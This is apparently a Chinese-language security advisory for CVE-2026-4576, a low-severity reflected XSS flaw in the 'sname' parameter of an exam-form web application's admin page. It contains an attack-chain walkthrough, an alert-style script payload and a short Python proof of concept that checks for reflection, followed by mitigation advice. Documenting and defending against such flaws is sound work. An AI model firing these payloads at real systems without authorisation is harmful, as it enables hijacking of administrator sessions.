CVE-2026-4576 CVSS 2.4 低危

CVE-2026-4576 Exam Form Submission跨站脚本漏洞

披露日期: 2026-03-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4576

漏洞类型

跨站脚本 (XSS)

CVSS评分

2.4 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

code-projects Exam Form Submission

漏洞概述

code-projects Exam Form Submission 1.0 版本被披露存在跨站脚本（XSS）漏洞。该漏洞源于 /admin/update_s5.php 文件未对用户提交的参数 sname 进行严格的过滤和转义。远程攻击者可利用此漏洞构造恶意请求，诱导具有高权限的管理员用户访问，从而在受害者浏览器中执行任意 JavaScript 脚本。此漏洞可能导致用户会话被劫持或数据被篡改。

技术细节

该漏洞属于典型的跨站脚本漏洞，具体发生在 code-projects Exam Form Submission 1.0 的后台管理接口中。漏洞文件为 /admin/update_s5.php，关键问题在于应用程序直接接收并使用了 'sname' 参数，而未应用 HTML 实体编码或有效的输入验证机制。攻击者可以通过发送包含恶意 HTML/JavaScript 标签的 HTTP 请求（如 GET 或 POST）来利用此漏洞。由于 CVSS 向量显示需要高权限（PR:H）和用户交互（UI:R），攻击链通常涉及社会工程学手段，即诱骗管理员点击特制的链接。一旦管理员触发请求，服务器将未过滤的 payload 返回给浏览器，导致代码执行。尽管 CVSS 评分仅为 2.4（低危），但在管理员会话上下文中执行 JS 代码，可能导致后台账户被接管或敏感数据泄露。

攻击链分析

STEP 1

侦察

攻击者识别目标正在使用 code-projects Exam Form Submission 1.0，并确认 /admin/update_s5.php 接口可访问。

STEP 2

构造载荷

攻击者构造包含恶意 JavaScript 代码的数据，将其赋值给 'sname' 参数，例如：sname=<script>alert(1)</script>。

STEP 3

诱导交互

由于漏洞需要高权限用户交互（PR:H, UI:R），攻击者通过钓鱼等方式诱导管理员点击带有恶意参数的链接。

STEP 4

执行攻击

管理员访问链接后，服务器处理请求并在响应中未经过滤地返回恶意脚本，管理员浏览器解析并执行该脚本。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Define the target URL
# Replace 'target_ip' with the actual IP or domain of the vulnerable application
target_url = "http://target_ip/admin/update_s5.php"

# Define the payload for XSS
# This payload attempts to execute a simple JavaScript alert
payload = "<script>alert('CVE-2026-4576_XSS_Test');</script>"

# Prepare the parameters
# The vulnerability is in the 'sname' parameter
params = {
    "sname": payload
}

try:
    # Send the GET request
    response = requests.get(target_url, params=params, timeout=5)

    # Check if the payload is reflected in the response (unfiltered)
    if payload in response.text:
        print("[+] Vulnerability confirmed! The payload was reflected in the response.")
    else:
        print("[-] Vulnerability not confirmed or payload was filtered.")

except requests.exceptions.RequestException as e:
    print(f"[!] Error connecting to the target: {e}")

影响范围

code-projects Exam Form Submission 1.0

防御指南

临时缓解措施

建议管理员立即检查并修改 /admin/update_s5.php 的源代码，使用 htmlspecialchars() 等函数对变量 sname 进行转义处理。在官方发布补丁前，应限制外部网络对后台管理页面的访问，并加强对管理员的安全意识培训，避免点击不明链接。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4576
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4576
3 Details https://www.cvedetails.com/cve/CVE-2026-4576/
4 VulDB https://vuldb.com/cve/CVE-2026-4576
5 Link https://code-projects.org/
6 Link https://github.com/rockycheng1/cve/issues/4
7 Link https://vuldb.com/?ctiid.352413
8 Link https://vuldb.com/?id.352413
9 Link https://vuldb.com/?submit.775204

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表